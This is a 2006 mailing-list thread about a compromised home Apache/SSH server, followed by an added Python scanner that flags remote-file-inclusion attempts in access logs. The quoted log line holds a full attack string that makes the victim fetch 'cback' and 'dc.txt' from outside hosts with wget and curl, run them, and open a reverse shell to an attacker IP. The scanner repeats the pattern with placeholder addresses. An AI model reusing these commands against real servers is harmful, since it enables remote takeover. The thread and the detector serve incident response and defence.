My home desktop was compromised, but how?
Michael J. Lynch
mlynch at gcom.com
Tue Feb 28 21:31:25 UTC 2006
Carthik Sharma wrote:
> Hi,
>
> I run an apache, ssh server from my home computer. I have not
> installed any php scripts whatsoever. All there are are text files,
> and the odd html file.
>
> Somebody seems to have hacked into my desktop/server. I find files in
> the /tmp/ directory (like "agent.8213") which I cannot open, these are
> setuid-ed -- how do I open these?
>
> In my apache access logs, there are things like
> "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
>
> The above is a valid URL, and will take you to a script to deface
> someone's php script etc, I suppose. Now, how did this malicious
> hacker get into my computer?
>
> (The full line is:
> 192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
> HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)" )
> How would I go about tracing how this incident happened?
>
> Any server/security admins here that can help me with a little
> patience? I really want to get to the root of this and find out why
> whatever happened happened.
>
> None of the passwords for the ssh accounts are dictionary words, in
> fact all are combinations of letters, numbers and sometimes special
> symbols.
>
> I have done nothing special to modify apache, or the ssh daemon, in
> fact, sshd listens on port 8888.
>
> I could paste logs here, but they would be too long. For now, I have
> stopped the apache and ssh servers.
>
> Any help will be most welcome. My security bubble just burst :(
>
> Carthik.
>
I'm not sure how you'd go about tracing down what happened, but my guess
is that it came in with a webpage. It clearly looks to be an attempt to
break into your machine as the *dc.txt* file it downloaded is a perl
script that looks to me like it attempts to connect an interactive shell
to a remote server of some sort. I believe this to be malicious because
the script redirects the shell history to /dev/null to hide what was
done.
You mention you are running a web server. One of the IP addresses
embedded in the long string is the address of a name server at a web
development company. Are you using such a service?
I don't know if any of this will help, but I hope so.
--
Michael J. Lynch
What if the hokey pokey IS what it's all about -- author unknown
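The access-log line quoted above is the kind of thing a small log scanner can pick out automatically: a query-string parameter (here mosConfig_absolute_path) whose value is a remote URL, and a second parameter carrying shell commands. The following script is an added example for readers of this thread, not code from the original post or from any project; it parses Apache combined-format lines, URL-decodes each query parameter, and reports requests that fit that shape. The log lines, IP addresses (documentation ranges) and regular expressions in it are constructed for the example; the status code is kept in each finding because the quoted line returned a 404, and whether such a request actually reached a script is a question the log answers, not the URL alone.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format, as in the line quoted in the thread (constructed regex).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# A parameter value that is itself a remote URL is the classic remote-file-inclusion shape.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Command names following a shell separator (or at the start of the value) inside a query
# parameter: downloaders, chmod, interpreters. Constructed list; extend to taste.
SHELL_RE = re.compile(r'(?:^|[;|])\s*(?:wget|curl|chmod|perl|sh|bash|nc)\b', re.IGNORECASE)


def split_query(query):
    """Split a raw query string on '&' only and URL-decode names and values.

    Done by hand rather than with urllib.parse.parse_qsl so that ';' inside a
    value (a shell separator in the attack string) is never treated as a pair
    separator, which older Python versions do by default.
    """
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs


def inspect_request(target):
    """Return the reasons (possibly none) a request target looks like an include/injection attempt."""
    reasons = []
    _path, _, query = target.partition("?")
    for name, value in split_query(query):
        if REMOTE_URL_RE.match(value.strip()):
            reasons.append(f"remote URL in parameter {name!r}")
        if SHELL_RE.search(value):
            reasons.append(f"shell commands in parameter {name!r}")
    return reasons


def scan_log(lines):
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = inspect_request(m.group("target"))
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": m.group("status"),
                "reasons": reasons,
            })
    return findings


# Constructed sample log: two ordinary requests and one shaped like the quoted attack line.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Feb/2006:14:50:01 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Feb/2006:14:51:12 -0500] "GET /search.html?q=http%20basics HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [26/Feb/2006:14:56:06 -0500] "GET /index2.php?option=com_content&do_pdf=1'
    '&id=1index2.php?_REQUEST[option]=com_content&mosConfig_absolute_path=http://198.51.100.7/cmd.txt?'
    '&cmd=cd%20/tmp;wget%20198.51.100.9/cback;chmod%20744%20cback;./cback%20198.51.100.10%208081;echo%20YYY;echo|'
    ' HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']}: " + "; ".join(f["reasons"]))
```

Run it against a real access log with `scan_log(open("/var/log/apache2/access.log").read().splitlines())`; the two regexes are deliberately narrow (a remote URL as a whole parameter value, or a known command after a shell separator), so a query like `q=http basics` is not reported.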